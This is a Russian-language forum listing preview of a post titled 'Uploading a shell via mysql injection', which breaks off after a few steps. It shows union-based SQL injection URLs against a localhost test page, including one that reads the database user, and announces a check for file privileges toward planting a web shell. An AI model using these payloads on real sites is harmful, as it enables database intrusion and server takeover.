mysql injection

  1. AnGel

    Заливка шелла через mysql injection

    Допустим у нас есть SQL инъекция с выводом: http://localhost/sql/test.php?id=-1+union+select+1,2,3--+1 Узнаем имя пользователя БД, под которым мы сидим: http://localhost/sql/test.php?id=-1+union+select+1,user(),3--+1 Проверяем, есть ли файловые привелегии у нашего юзера...
Сверху